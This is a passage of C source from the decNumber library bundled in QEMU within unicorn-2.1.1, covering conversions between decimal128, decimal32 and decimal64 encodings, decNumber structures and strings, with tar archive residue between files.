load source from storage; this is endian */ pu=(const uInt *)d128->bytes; /* overlay */ if (DECLITEND) { sourlo=pu[0]; /* directly load the low int */ sourml=pu[1]; /* then the mid-low */ sourmh=pu[2]; /* then the mid-high */ sourhi=pu[3]; /* then the high int */ } else { sourhi=pu[0]; /* directly load the high int */ sourmh=pu[1]; /* then the mid-high */ sourml=pu[2]; /* then the mid-low */ sourlo=pu[3]; /* then the low int */ } c=string; /* where result will go */ if (((Int)sourhi)<0) *c++='-'; /* handle sign */ comb=(sourhi>>26)&0x1f; /* combination field */ msd=COMBMSD[comb]; /* decode the combination field */ exp=COMBEXP[comb]; /* .. */ if (exp==3) { if (msd==0) { /* infinity */ strcpy(c, "Inf"); strcpy(c+3, "inity"); return string; /* easy */ } if (sourhi&0x02000000) *c++='s'; /* sNaN */ strcpy(c, "NaN"); /* complete word */ c+=3; /* step past */ if (sourlo==0 && sourml==0 && sourmh==0 && (sourhi&0x0003ffff)==0) return string; /* zero payload */ /* otherwise drop through to add integer; set correct exp */ exp=0; msd=0; /* setup for following code */ } else exp=(exp<<12)+((sourhi>>14)&0xfff)-DECIMAL128_Bias; /* unbiased */ /* convert 34 digits of significand to characters */ cstart=c; /* save start of coefficient */ if (msd) *c++='0'+(char)msd; /* non-zero most significant digit */ /* Now decode the declets. After extracting each one, it is */ /* decoded to binary and then to a 4-char sequence by table lookup; */ /* the 4-chars are a 1-char length (significant digits, except 000 */ /* has length 0). This allows us to left-align the first declet */ /* with non-zero content, then remaining ones are full 3-char */ /* length. We use fixed-length memcpys because variable-length */ /* causes a subroutine call in GCC. (These are length 4 for speed */ /* and are safe because the array has an extra terminator byte.) */ #define dpd2char u=&BIN2CHAR[DPD2BIN[dpd]*4]; \ if (c!=cstart) {memcpy(c, u+1, 4); c+=3;} \ else if (*u) {memcpy(c, u+4-*u, 4); c+=*u;} dpd=(sourhi>>4)&0x3ff; /* declet 1 */ dpd2char; dpd=((sourhi&0xf)<<6) | (sourmh>>26); /* declet 2 */ dpd2char; dpd=(sourmh>>16)&0x3ff; /* declet 3 */ dpd2char; dpd=(sourmh>>6)&0x3ff; /* declet 4 */ dpd2char; dpd=((sourmh&0x3f)<<4) | (sourml>>28); /* declet 5 */ dpd2char; dpd=(sourml>>18)&0x3ff; /* declet 6 */ dpd2char; dpd=(sourml>>8)&0x3ff; /* declet 7 */ dpd2char; dpd=((sourml&0xff)<<2) | (sourlo>>30); /* declet 8 */ dpd2char; dpd=(sourlo>>20)&0x3ff; /* declet 9 */ dpd2char; dpd=(sourlo>>10)&0x3ff; /* declet 10 */ dpd2char; dpd=(sourlo)&0x3ff; /* declet 11 */ dpd2char; if (c==cstart) *c++='0'; /* all zeros -- make 0 */ if (exp==0) { /* integer or NaN case -- easy */ *c='\0'; /* terminate */ return string; } /* non-0 exponent */ e=0; /* assume no E */ pre=c-cstart+exp; /* [here, pre-exp is the digits count (==1 for zero)] */ if (exp>0 || pre<-5) { /* need exponential form */ e=pre-1; /* calculate E value */ pre=1; /* assume one digit before '.' */ } /* exponential form */ /* modify the coefficient, adding 0s, '.', and E+nn as needed */ s=c-1; /* source (LSD) */ if (pre>0) { /* ddd.ddd (plain), perhaps with E */ char *dotat=cstart+pre; if (dotat<c) { /* if embedded dot needed... */ t=c; /* target */ for (; s>=dotat; s--, t--) *t=*s; /* open the gap; leave t at gap */ *t='.'; /* insert the dot */ c++; /* length increased by one */ } /* finally add the E-part, if needed; it will never be 0, and has */ /* a maximum length of 4 digits */ if (e!=0) { *c++='E'; /* starts with E */ *c++='+'; /* assume positive */ if (e<0) { *(c-1)='-'; /* oops, need '-' */ e=-e; /* uInt, please */ } if (e<1000) { /* 3 (or fewer) digits case */ u=&BIN2CHAR[e*4]; /* -> length byte */ memcpy(c, u+4-*u, 4); /* copy fixed 4 characters [is safe] */ c+=*u; /* bump pointer appropriately */ } else { /* 4-digits */ Int thou=((e>>3)*1049)>>17; /* e/1000 */ Int rem=e-(1000*thou); /* e%1000 */ *c++='0'+(char)thou; u=&BIN2CHAR[rem*4]; /* -> length byte */ memcpy(c, u+1, 4); /* copy fixed 3+1 characters [is safe] */ c+=3; /* bump pointer, always 3 digits */ } } *c='\0'; /* add terminator */ /*printf("res %s\n", string); */ return string; } /* pre>0 */ /* -5<=pre<=0: here for plain 0.ddd or 0.000ddd forms (can never have E) */ t=c+1-pre; *(t+1)='\0'; /* can add terminator now */ for (; s>=cstart; s--, t--) *t=*s; /* shift whole coefficient right */ c=cstart; *c++='0'; /* always starts with 0. */ *c++='.'; for (; pre<0; pre++) *c++='0'; /* add any 0's after '.' */ /*printf("res %s\n", string); */ return string; } /* decimal128ToString */ /* ------------------------------------------------------------------ */ /* to-number -- conversion from numeric string */ /* */ /* decimal128FromString(result, string, set); */ /* */ /* result is the decimal128 format number which gets the result of */ /* the conversion */ /* *string is the character string which should contain a valid */ /* number (which may be a special value) */ /* set is the context */ /* */ /* The context is supplied to this routine is used for error handling */ /* (setting of status and traps) and for the rounding mode, only. */ /* If an error occurs, the result will be a valid decimal128 NaN. */ /* ------------------------------------------------------------------ */ decimal128 * decimal128FromString(decimal128 *result, const char *string, decContext *set) { decContext dc; /* work */ decNumber dn; /* .. */ decContextDefault(&dc, DEC_INIT_DECIMAL128); /* no traps, please */ dc.round=set->round; /* use supplied rounding */ decNumberFromString(&dn, string, &dc); /* will round if needed */ decimal128FromNumber(result, &dn, &dc); if (dc.status!=0) { /* something happened */ decContextSetStatus(set, dc.status); /* .. pass it on */ } return result; } /* decimal128FromString */ /* ------------------------------------------------------------------ */ /* decimal128IsCanonical -- test whether encoding is canonical */ /* d128 is the source decimal128 */ /* returns 1 if the encoding of d128 is canonical, 0 otherwise */ /* No error is possible. */ /* ------------------------------------------------------------------ */ uint32_t decimal128IsCanonical(const decimal128 *d128) { decNumber dn; /* work */ decimal128 canon; /* .. */ decContext dc; /* .. */ decContextDefault(&dc, DEC_INIT_DECIMAL128); decimal128ToNumber(d128, &dn); decimal128FromNumber(&canon, &dn, &dc);/* canon will now be canonical */ return memcmp(d128, &canon, DECIMAL128_Bytes)==0; } /* decimal128IsCanonical */ /* ------------------------------------------------------------------ */ /* decimal128Canonical -- copy an encoding, ensuring it is canonical */ /* d128 is the source decimal128 */ /* result is the target (may be the same decimal128) */ /* returns result */ /* No error is possible. */ /* ------------------------------------------------------------------ */ decimal128 * decimal128Canonical(decimal128 *result, const decimal128 *d128) { decNumber dn; /* work */ decContext dc; /* .. */ decContextDefault(&dc, DEC_INIT_DECIMAL128); decimal128ToNumber(d128, &dn); decimal128FromNumber(result, &dn, &dc);/* result will now be canonical */ return result; } /* decimal128Canonical */ #if DECTRACE || DECCHECK /* Macros for accessing decimal128 fields. These assume the argument is a reference (pointer) to the decimal128 structure, and the decimal128 is in network byte order (big-endian) */ /* Get sign */ #define decimal128Sign(d) ((unsigned)(d)->bytes[0]>>7) /* Get combination field */ #define decimal128Comb(d) (((d)->bytes[0] & 0x7c)>>2) /* Get exponent continuation [does not remove bias] */ #define decimal128ExpCon(d) ((((d)->bytes[0] & 0x03)<<10) \ | ((unsigned)(d)->bytes[1]<<2) \ | ((unsigned)(d)->bytes[2]>>6)) /* Set sign [this assumes sign previously 0] */ #define decimal128SetSign(d, b) { \ (d)->bytes[0]|=((unsigned)(b)<<7);} /* Set exponent continuation [does not apply bias] */ /* This assumes range has been checked and exponent previously 0; */ /* type of exponent must be unsigned */ #define decimal128SetExpCon(d, e) { \ (d)->bytes[0]|=(uint8_t)((e)>>10); \ (d)->bytes[1] =(uint8_t)(((e)&0x3fc)>>2); \ (d)->bytes[2]|=(uint8_t)(((e)&0x03)<<6);} /* ------------------------------------------------------------------ */ /* decimal128Show -- display a decimal128 in hexadecimal [debug aid] */ /* d128 -- the number to show */ /* ------------------------------------------------------------------ */ /* Also shows sign/cob/expconfields extracted */ void decimal128Show(const decimal128 *d128) { char buf[DECIMAL128_Bytes*2+1]; Int i, j=0; if (DECLITEND) { for (i=0; i<DECIMAL128_Bytes; i++, j+=2) { sprintf(&buf[j], "%02x", d128->bytes[15-i]); } printf(" D128> %s [S:%d Cb:%02x Ec:%02x] LittleEndian\n", buf, d128->bytes[15]>>7, (d128->bytes[15]>>2)&0x1f, ((d128->bytes[15]&0x3)<<10)|(d128->bytes[14]<<2)| (d128->bytes[13]>>6)); } else { for (i=0; i<DECIMAL128_Bytes; i++, j+=2) { sprintf(&buf[j], "%02x", d128->bytes[i]); } printf(" D128> %s [S:%d Cb:%02x Ec:%02x] BigEndian\n", buf, decimal128Sign(d128), decimal128Comb(d128), decimal128ExpCon(d128)); } } /* decimal128Show */ #endif ������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/libdecnumber/dpd/decimal32.c�����������������������������������������������������0000664�0000000�0000000�00000045730�14675241067�0021275�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Decimal 32-bit format module for the decNumber C Library. Copyright (C) 2005, 2007 Free Software Foundation, Inc. Contributed by IBM Corporation. Author Mike Cowlishaw. This file is part of GCC. GCC is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2, or (at your option) any later version. In addition to the permissions in the GNU General Public License, the Free Software Foundation gives you unlimited permission to link the compiled version of this file into combinations with other programs, and to distribute those combinations without any restriction coming from the use of this file. (The General Public License restrictions do apply in other respects; for example, they cover modification of the file, and distribution when not linked into a combine executable.) GCC is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with GCC; see the file COPYING. If not, write to the Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* ------------------------------------------------------------------ */ /* Decimal 32-bit format module */ /* ------------------------------------------------------------------ */ /* This module comprises the routines for decimal32 format numbers. */ /* Conversions are supplied to and from decNumber and String. */ /* */ /* This is used when decNumber provides operations, either for all */ /* operations or as a proxy between decNumber and decSingle. */ /* */ /* Error handling is the same as decNumber (qv.). */ /* ------------------------------------------------------------------ */ #include "qemu/osdep.h" #include "libdecnumber/dconfig.h" #define DECNUMDIGITS 7 /* make decNumbers with space for 7 */ #include "libdecnumber/decNumber.h" #include "libdecnumber/decNumberLocal.h" #include "libdecnumber/dpd/decimal32.h" /* Utility tables and routines [in decimal64.c] */ extern const uInt COMBEXP[32], COMBMSD[32]; extern const uByte BIN2CHAR[4001]; extern void decDigitsToDPD(const decNumber *, uInt *, Int); extern void decDigitsFromDPD(decNumber *, const uInt *, Int); #if DECTRACE || DECCHECK void decimal32Show(const decimal32 *); /* for debug */ extern void decNumberShow(const decNumber *); /* .. */ #endif /* Useful macro */ /* Clear a structure (e.g., a decNumber) */ #define DEC_clear(d) memset(d, 0, sizeof(*d)) /* ------------------------------------------------------------------ */ /* decimal32FromNumber -- convert decNumber to decimal32 */ /* */ /* ds is the target decimal32 */ /* dn is the source number (assumed valid) */ /* set is the context, used only for reporting errors */ /* */ /* The set argument is used only for status reporting and for the */ /* rounding mode (used if the coefficient is more than DECIMAL32_Pmax */ /* digits or an overflow is detected). If the exponent is out of the */ /* valid range then Overflow or Underflow will be raised. */ /* After Underflow a subnormal result is possible. */ /* */ /* DEC_Clamped is set if the number has to be 'folded down' to fit, */ /* by reducing its exponent and multiplying the coefficient by a */ /* power of ten, or if the exponent on a zero had to be clamped. */ /* ------------------------------------------------------------------ */ decimal32 * decimal32FromNumber(decimal32 *d32, const decNumber *dn, decContext *set) { uInt status=0; /* status accumulator */ Int ae; /* adjusted exponent */ decNumber dw; /* work */ decContext dc; /* .. */ uInt *pu; /* .. */ uInt comb, exp; /* .. */ uInt targ=0; /* target 32-bit */ /* If the number has too many digits, or the exponent could be */ /* out of range then reduce the number under the appropriate */ /* constraints. This could push the number to Infinity or zero, */ /* so this check and rounding must be done before generating the */ /* decimal32] */ ae=dn->exponent+dn->digits-1; /* [0 if special] */ if (dn->digits>DECIMAL32_Pmax /* too many digits */ || ae>DECIMAL32_Emax /* likely overflow */ || ae<DECIMAL32_Emin) { /* likely underflow */ decContextDefault(&dc, DEC_INIT_DECIMAL32); /* [no traps] */ dc.round=set->round; /* use supplied rounding */ decNumberPlus(&dw, dn, &dc); /* (round and check) */ /* [this changes -0 to 0, so enforce the sign...] */ dw.bits|=dn->bits&DECNEG; status=dc.status; /* save status */ dn=&dw; /* use the work number */ } /* maybe out of range */ if (dn->bits&DECSPECIAL) { /* a special value */ if (dn->bits&DECINF) targ=DECIMAL_Inf<<24; else { /* sNaN or qNaN */ if ((*dn->lsu!=0 || dn->digits>1) /* non-zero coefficient */ && (dn->digits<DECIMAL32_Pmax)) { /* coefficient fits */ decDigitsToDPD(dn, &targ, 0); } if (dn->bits&DECNAN) targ|=DECIMAL_NaN<<24; else targ|=DECIMAL_sNaN<<24; } /* a NaN */ } /* special */ else { /* is finite */ if (decNumberIsZero(dn)) { /* is a zero */ /* set and clamp exponent */ if (dn->exponent<-DECIMAL32_Bias) { exp=0; /* low clamp */ status|=DEC_Clamped; } else { exp=dn->exponent+DECIMAL32_Bias; /* bias exponent */ if (exp>DECIMAL32_Ehigh) { /* top clamp */ exp=DECIMAL32_Ehigh; status|=DEC_Clamped; } } comb=(exp>>3) & 0x18; /* msd=0, exp top 2 bits .. */ } else { /* non-zero finite number */ uInt msd; /* work */ Int pad=0; /* coefficient pad digits */ /* the dn is known to fit, but it may need to be padded */ exp=(uInt)(dn->exponent+DECIMAL32_Bias); /* bias exponent */ if (exp>DECIMAL32_Ehigh) { /* fold-down case */ pad=exp-DECIMAL32_Ehigh; exp=DECIMAL32_Ehigh; /* [to maximum] */ status|=DEC_Clamped; } /* fastpath common case */ if (DECDPUN==3 && pad==0) { targ=BIN2DPD[dn->lsu[0]]; if (dn->digits>3) targ|=(uInt)(BIN2DPD[dn->lsu[1]])<<10; msd=(dn->digits==7 ? dn->lsu[2] : 0); } else { /* general case */ decDigitsToDPD(dn, &targ, pad); /* save and clear the top digit */ msd=targ>>20; targ&=0x000fffff; } /* create the combination field */ if (msd>=8) comb=0x18 | ((exp>>5) & 0x06) | (msd & 0x01); else comb=((exp>>3) & 0x18) | msd; } targ|=comb<<26; /* add combination field .. */ targ|=(exp&0x3f)<<20; /* .. and exponent continuation */ } /* finite */ if (dn->bits&DECNEG) targ|=0x80000000; /* add sign bit */ /* now write to storage; this is endian */ pu=(uInt *)d32->bytes; /* overlay */ *pu=targ; /* directly store the int */ if (status!=0) decContextSetStatus(set, status); /* pass on status */ /* decimal32Show(d32); */ return d32; } /* decimal32FromNumber */ /* ------------------------------------------------------------------ */ /* decimal32ToNumber -- convert decimal32 to decNumber */ /* d32 is the source decimal32 */ /* dn is the target number, with appropriate space */ /* No error is possible. */ /* ------------------------------------------------------------------ */ decNumber * decimal32ToNumber(const decimal32 *d32, decNumber *dn) { uInt msd; /* coefficient MSD */ uInt exp; /* exponent top two bits */ uInt comb; /* combination field */ uInt sour; /* source 32-bit */ const uInt *pu; /* work */ /* load source from storage; this is endian */ pu=(const uInt *)d32->bytes; /* overlay */ sour=*pu; /* directly load the int */ comb=(sour>>26)&0x1f; /* combination field */ decNumberZero(dn); /* clean number */ if (sour&0x80000000) dn->bits=DECNEG; /* set sign if negative */ msd=COMBMSD[comb]; /* decode the combination field */ exp=COMBEXP[comb]; /* .. */ if (exp==3) { /* is a special */ if (msd==0) { dn->bits|=DECINF; return dn; /* no coefficient needed */ } else if (sour&0x02000000) dn->bits|=DECSNAN; else dn->bits|=DECNAN; msd=0; /* no top digit */ } else { /* is a finite number */ dn->exponent=(exp<<6)+((sour>>20)&0x3f)-DECIMAL32_Bias; /* unbiased */ } /* get the coefficient */ sour&=0x000fffff; /* clean coefficient continuation */ if (msd) { /* non-zero msd */ sour|=msd<<20; /* prefix to coefficient */ decDigitsFromDPD(dn, &sour, 3); /* process 3 declets */ return dn; } /* msd=0 */ if (!sour) return dn; /* easy: coefficient is 0 */ if (sour&0x000ffc00) /* need 2 declets? */ decDigitsFromDPD(dn, &sour, 2); /* process 2 declets */ else decDigitsFromDPD(dn, &sour, 1); /* process 1 declet */ return dn; } /* decimal32ToNumber */ /* ------------------------------------------------------------------ */ /* to-scientific-string -- conversion to numeric string */ /* to-engineering-string -- conversion to numeric string */ /* */ /* decimal32ToString(d32, string); */ /* decimal32ToEngString(d32, string); */ /* */ /* d32 is the decimal32 format number to convert */ /* string is the string where the result will be laid out */ /* */ /* string must be at least 24 characters */ /* */ /* No error is possible, and no status can be set. */ /* ------------------------------------------------------------------ */ char * decimal32ToEngString(const decimal32 *d32, char *string){ decNumber dn; /* work */ decimal32ToNumber(d32, &dn); decNumberToEngString(&dn, string); return string; } /* decimal32ToEngString */ char * decimal32ToString(const decimal32 *d32, char *string){ uInt msd; /* coefficient MSD */ Int exp; /* exponent top two bits or full */ uInt comb; /* combination field */ char *cstart; /* coefficient start */ char *c; /* output pointer in string */ const uInt *pu; /* work */ const uByte *u; /* .. */ char *s, *t; /* .. (source, target) */ Int dpd; /* .. */ Int pre, e; /* .. */ uInt sour; /* source 32-bit */ /* load source from storage; this is endian */ pu=(const uInt *)d32->bytes; /* overlay */ sour=*pu; /* directly load the int */ c=string; /* where result will go */ if (((Int)sour)<0) *c++='-'; /* handle sign */ comb=(sour>>26)&0x1f; /* combination field */ msd=COMBMSD[comb]; /* decode the combination field */ exp=COMBEXP[comb]; /* .. */ if (exp==3) { if (msd==0) { /* infinity */ strcpy(c, "Inf"); strcpy(c+3, "inity"); return string; /* easy */ } if (sour&0x02000000) *c++='s'; /* sNaN */ strcpy(c, "NaN"); /* complete word */ c+=3; /* step past */ if ((sour&0x000fffff)==0) return string; /* zero payload */ /* otherwise drop through to add integer; set correct exp */ exp=0; msd=0; /* setup for following code */ } else exp=(exp<<6)+((sour>>20)&0x3f)-DECIMAL32_Bias; /* unbiased */ /* convert 7 digits of significand to characters */ cstart=c; /* save start of coefficient */ if (msd) *c++='0'+(char)msd; /* non-zero most significant digit */ /* Now decode the declets. After extracting each one, it is */ /* decoded to binary and then to a 4-char sequence by table lookup; */ /* the 4-chars are a 1-char length (significant digits, except 000 */ /* has length 0). This allows us to left-align the first declet */ /* with non-zero content, then remaining ones are full 3-char */ /* length. We use fixed-length memcpys because variable-length */ /* causes a subroutine call in GCC. (These are length 4 for speed */ /* and are safe because the array has an extra terminator byte.) */ #define dpd2char u=&BIN2CHAR[DPD2BIN[dpd]*4]; \ if (c!=cstart) {memcpy(c, u+1, 4); c+=3;} \ else if (*u) {memcpy(c, u+4-*u, 4); c+=*u;} dpd=(sour>>10)&0x3ff; /* declet 1 */ dpd2char; dpd=(sour)&0x3ff; /* declet 2 */ dpd2char; if (c==cstart) *c++='0'; /* all zeros -- make 0 */ if (exp==0) { /* integer or NaN case -- easy */ *c='\0'; /* terminate */ return string; } /* non-0 exponent */ e=0; /* assume no E */ pre=c-cstart+exp; /* [here, pre-exp is the digits count (==1 for zero)] */ if (exp>0 || pre<-5) { /* need exponential form */ e=pre-1; /* calculate E value */ pre=1; /* assume one digit before '.' */ } /* exponential form */ /* modify the coefficient, adding 0s, '.', and E+nn as needed */ s=c-1; /* source (LSD) */ if (pre>0) { /* ddd.ddd (plain), perhaps with E */ char *dotat=cstart+pre; if (dotat<c) { /* if embedded dot needed... */ t=c; /* target */ for (; s>=dotat; s--, t--) *t=*s; /* open the gap; leave t at gap */ *t='.'; /* insert the dot */ c++; /* length increased by one */ } /* finally add the E-part, if needed; it will never be 0, and has */ /* a maximum length of 3 digits (E-101 case) */ if (e!=0) { *c++='E'; /* starts with E */ *c++='+'; /* assume positive */ if (e<0) { *(c-1)='-'; /* oops, need '-' */ e=-e; /* uInt, please */ } u=&BIN2CHAR[e*4]; /* -> length byte */ memcpy(c, u+4-*u, 4); /* copy fixed 4 characters [is safe] */ c+=*u; /* bump pointer appropriately */ } *c='\0'; /* add terminator */ /*printf("res %s\n", string); */ return string; } /* pre>0 */ /* -5<=pre<=0: here for plain 0.ddd or 0.000ddd forms (can never have E) */ t=c+1-pre; *(t+1)='\0'; /* can add terminator now */ for (; s>=cstart; s--, t--) *t=*s; /* shift whole coefficient right */ c=cstart; *c++='0'; /* always starts with 0. */ *c++='.'; for (; pre<0; pre++) *c++='0'; /* add any 0's after '.' */ /*printf("res %s\n", string); */ return string; } /* decimal32ToString */ /* ------------------------------------------------------------------ */ /* to-number -- conversion from numeric string */ /* */ /* decimal32FromString(result, string, set); */ /* */ /* result is the decimal32 format number which gets the result of */ /* the conversion */ /* *string is the character string which should contain a valid */ /* number (which may be a special value) */ /* set is the context */ /* */ /* The context is supplied to this routine is used for error handling */ /* (setting of status and traps) and for the rounding mode, only. */ /* If an error occurs, the result will be a valid decimal32 NaN. */ /* ------------------------------------------------------------------ */ decimal32 * decimal32FromString(decimal32 *result, const char *string, decContext *set) { decContext dc; /* work */ decNumber dn; /* .. */ decContextDefault(&dc, DEC_INIT_DECIMAL32); /* no traps, please */ dc.round=set->round; /* use supplied rounding */ decNumberFromString(&dn, string, &dc); /* will round if needed */ decimal32FromNumber(result, &dn, &dc); if (dc.status!=0) { /* something happened */ decContextSetStatus(set, dc.status); /* .. pass it on */ } return result; } /* decimal32FromString */ /* ------------------------------------------------------------------ */ /* decimal32IsCanonical -- test whether encoding is canonical */ /* d32 is the source decimal32 */ /* returns 1 if the encoding of d32 is canonical, 0 otherwise */ /* No error is possible. */ /* ------------------------------------------------------------------ */ uint32_t decimal32IsCanonical(const decimal32 *d32) { decNumber dn; /* work */ decimal32 canon; /* .. */ decContext dc; /* .. */ decContextDefault(&dc, DEC_INIT_DECIMAL32); decimal32ToNumber(d32, &dn); decimal32FromNumber(&canon, &dn, &dc);/* canon will now be canonical */ return memcmp(d32, &canon, DECIMAL32_Bytes)==0; } /* decimal32IsCanonical */ /* ------------------------------------------------------------------ */ /* decimal32Canonical -- copy an encoding, ensuring it is canonical */ /* d32 is the source decimal32 */ /* result is the target (may be the same decimal32) */ /* returns result */ /* No error is possible. */ /* ------------------------------------------------------------------ */ decimal32 * decimal32Canonical(decimal32 *result, const decimal32 *d32) { decNumber dn; /* work */ decContext dc; /* .. */ decContextDefault(&dc, DEC_INIT_DECIMAL32); decimal32ToNumber(d32, &dn); decimal32FromNumber(result, &dn, &dc);/* result will now be canonical */ return result; } /* decimal32Canonical */ #if DECTRACE || DECCHECK /* Macros for accessing decimal32 fields. These assume the argument is a reference (pointer) to the decimal32 structure, and the decimal32 is in network byte order (big-endian) */ /* Get sign */ #define decimal32Sign(d) ((unsigned)(d)->bytes[0]>>7) /* Get combination field */ #define decimal32Comb(d) (((d)->bytes[0] & 0x7c)>>2) /* Get exponent continuation [does not remove bias] */ #define decimal32ExpCon(d) ((((d)->bytes[0] & 0x03)<<4) \ | ((unsigned)(d)->bytes[1]>>4)) /* Set sign [this assumes sign previously 0] */ #define decimal32SetSign(d, b) { \ (d)->bytes[0]|=((unsigned)(b)<<7);} /* Set exponent continuation [does not apply bias] */ /* This assumes range has been checked and exponent previously 0; */ /* type of exponent must be unsigned */ #define decimal32SetExpCon(d, e) { \ (d)->bytes[0]|=(uint8_t)((e)>>4); \ (d)->bytes[1]|=(uint8_t)(((e)&0x0F)<<4);} /* ------------------------------------------------------------------ */ /* decimal32Show -- display a decimal32 in hexadecimal [debug aid] */ /* d32 -- the number to show */ /* ------------------------------------------------------------------ */ /* Also shows sign/cob/expconfields extracted - valid bigendian only */ void decimal32Show(const decimal32 *d32) { char buf[DECIMAL32_Bytes*2+1]; Int i, j=0; if (DECLITEND) { for (i=0; i<DECIMAL32_Bytes; i++, j+=2) { sprintf(&buf[j], "%02x", d32->bytes[3-i]); } printf(" D32> %s [S:%d Cb:%02x Ec:%02x] LittleEndian\n", buf, d32->bytes[3]>>7, (d32->bytes[3]>>2)&0x1f, ((d32->bytes[3]&0x3)<<4)| (d32->bytes[2]>>4)); } else { for (i=0; i<DECIMAL32_Bytes; i++, j+=2) { sprintf(&buf[j], "%02x", d32->bytes[i]); } printf(" D32> %s [S:%d Cb:%02x Ec:%02x] BigEndian\n", buf, decimal32Sign(d32), decimal32Comb(d32), decimal32ExpCon(d32)); } } /* decimal32Show */ #endif ����������������������������������������unicorn-2.1.1/qemu/libdecnumber/dpd/decimal64.c�����������������������������������������������������0000664�0000000�0000000�00000100267�14675241067�0021277�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Decimal 64-bit format module for the decNumber C Library. Copyright (C) 2005, 2007 Free Software Foundation, Inc. Contributed by IBM Corporation. Author Mike Cowlishaw. This file is part of GCC. GCC is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2, or (at your option) any later version. In addition to the permissions in the GNU General Public License, the Free Software Foundation gives you unlimited permission to link the compiled version of this file into combinations with other programs, and to distribute those combinations without any restriction coming from the use of this file. (The General Public License restrictions do apply in other respects; for example, they cover modification of the file, and distribution when not linked into a combine executable.) GCC is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with GCC; see the file COPYING. If not, write to the Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* ------------------------------------------------------------------ */ /* Decimal 64-bit format module */ /* ------------------------------------------------------------------ */ /* This module comprises the routines for decimal64 format numbers. */ /* Conversions are supplied to and from decNumber and String. */ /* */ /* This is used when decNumber provides operations, either for all */ /* operations or as a proxy between decNumber and decSingle. */ /* */ /* Error handling is the same as decNumber (qv.). */ /* ------------------------------------------------------------------ */ #include "qemu/osdep.h" #include "libdecnumber/dconfig.h" #define DECNUMDIGITS 16 /* make decNumbers with space for 16 */ #include "libdecnumber/decNumber.h" #include "libdecnumber/decNumberLocal.h" #include "libdecnumber/dpd/decimal64.h" /* Utility routines and tables [in decimal64.c]; externs for C++ */ extern const uInt COMBEXP[32], COMBMSD[32]; extern const uByte BIN2CHAR[4001]; extern void decDigitsFromDPD(decNumber *, const uInt *, Int); extern void decDigitsToDPD(const decNumber *, uInt *, Int); #if DECTRACE || DECCHECK void decimal64Show(const decimal64 *); /* for debug */ extern void decNumberShow(const decNumber *); /* .. */ #endif /* Useful macro */ /* Clear a structure (e.g., a decNumber) */ #define DEC_clear(d) memset(d, 0, sizeof(*d)) /* define and include the tables to use for conversions */ #define DEC_BIN2CHAR 1 #define DEC_DPD2BIN 1 #define DEC_BIN2DPD 1 /* used for all sizes */ #include "libdecnumber/decDPD.h" /* ------------------------------------------------------------------ */ /* decimal64FromNumber -- convert decNumber to decimal64 */ /* */ /* ds is the target decimal64 */ /* dn is the source number (assumed valid) */ /* set is the context, used only for reporting errors */ /* */ /* The set argument is used only for status reporting and for the */ /* rounding mode (used if the coefficient is more than DECIMAL64_Pmax */ /* digits or an overflow is detected). If the exponent is out of the */ /* valid range then Overflow or Underflow will be raised. */ /* After Underflow a subnormal result is possible. */ /* */ /* DEC_Clamped is set if the number has to be 'folded down' to fit, */ /* by reducing its exponent and multiplying the coefficient by a */ /* power of ten, or if the exponent on a zero had to be clamped. */ /* ------------------------------------------------------------------ */ decimal64 * decimal64FromNumber(decimal64 *d64, const decNumber *dn, decContext *set) { uInt status=0; /* status accumulator */ Int ae; /* adjusted exponent */ decNumber dw; /* work */ decContext dc; /* .. */ uInt *pu; /* .. */ uInt comb, exp; /* .. */ uInt targar[2]={0, 0}; /* target 64-bit */ #define targhi targar[1] /* name the word with the sign */ #define targlo targar[0] /* and the other */ /* If the number has too many digits, or the exponent could be */ /* out of range then reduce the number under the appropriate */ /* constraints. This could push the number to Infinity or zero, */ /* so this check and rounding must be done before generating the */ /* decimal64] */ ae=dn->exponent+dn->digits-1; /* [0 if special] */ if (dn->digits>DECIMAL64_Pmax /* too many digits */ || ae>DECIMAL64_Emax /* likely overflow */ || ae<DECIMAL64_Emin) { /* likely underflow */ decContextDefault(&dc, DEC_INIT_DECIMAL64); /* [no traps] */ dc.round=set->round; /* use supplied rounding */ decNumberPlus(&dw, dn, &dc); /* (round and check) */ /* [this changes -0 to 0, so enforce the sign...] */ dw.bits|=dn->bits&DECNEG; status=dc.status; /* save status */ dn=&dw; /* use the work number */ } /* maybe out of range */ if (dn->bits&DECSPECIAL) { /* a special value */ if (dn->bits&DECINF) targhi=DECIMAL_Inf<<24; else { /* sNaN or qNaN */ if ((*dn->lsu!=0 || dn->digits>1) /* non-zero coefficient */ && (dn->digits<DECIMAL64_Pmax)) { /* coefficient fits */ decDigitsToDPD(dn, targar, 0); } if (dn->bits&DECNAN) targhi|=DECIMAL_NaN<<24; else targhi|=DECIMAL_sNaN<<24; } /* a NaN */ } /* special */ else { /* is finite */ if (decNumberIsZero(dn)) { /* is a zero */ /* set and clamp exponent */ if (dn->exponent<-DECIMAL64_Bias) { exp=0; /* low clamp */ status|=DEC_Clamped; } else { exp=dn->exponent+DECIMAL64_Bias; /* bias exponent */ if (exp>DECIMAL64_Ehigh) { /* top clamp */ exp=DECIMAL64_Ehigh; status|=DEC_Clamped; } } comb=(exp>>5) & 0x18; /* msd=0, exp top 2 bits .. */ } else { /* non-zero finite number */ uInt msd; /* work */ Int pad=0; /* coefficient pad digits */ /* the dn is known to fit, but it may need to be padded */ exp=(uInt)(dn->exponent+DECIMAL64_Bias); /* bias exponent */ if (exp>DECIMAL64_Ehigh) { /* fold-down case */ pad=exp-DECIMAL64_Ehigh; exp=DECIMAL64_Ehigh; /* [to maximum] */ 